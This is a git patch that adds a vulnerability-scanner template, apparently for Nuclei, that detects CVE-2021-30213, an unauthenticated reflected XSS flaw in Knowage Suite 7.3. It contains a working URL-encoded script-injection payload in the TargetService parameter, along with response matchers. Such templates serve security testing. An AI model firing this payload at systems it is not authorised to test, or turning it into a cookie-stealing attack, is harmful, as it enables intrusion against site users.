From f2ff7a1a7e0c500a9aefa332a1d792108f99ae06 Mon Sep 17 00:00:00 2001 From: alph4byt3 <67894940+alph4byt3@users.noreply.github.com> Date: Wed, 24 Nov 2021 17:43:59 +0200 Subject: [PATCH] Create CVE-2021-30213.yaml --- cves/2021/CVE-2021-30213.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2021/CVE-2021-30213.yaml diff --git a/cves/2021/CVE-2021-30213.yaml b/cves/2021/CVE-2021-30213.yaml new file mode 100644 index 0000000000..b6f1e605ac --- /dev/null +++ b/cves/2021/CVE-2021-30213.yaml @@ -0,0 +1,31 @@ +id: CVE-2021-30213 + +info: + name: Knowage Suite 7.3 XSS + author: alph4byt3 + severity: medium + description: Knowage Suite 7.3 is vulnerable to unauthenticated reflected cross-site scripting (XSS). An attacker can inject arbitrary web script in '/servlet/AdapterHTTP' via the 'targetService' parameter. + + reference: https://nvd.nist.gov/vuln/detail/CVE-2021-30213 + tags: cve,cve2021,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/knowage/servlet/AdapterHTTP?Page=LoginPage&NEW_SESSION=TRUE&TargetService=%2Fknowage%2Fservlet%2FAdapterHTTP%3FPage%3DLoginPage%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C" + + matchers-condition: and + matchers: + - type: word + words: + - '">' + part: body + + - type: status + status: + - 200 + + - type: word + part: header + words: + - text/html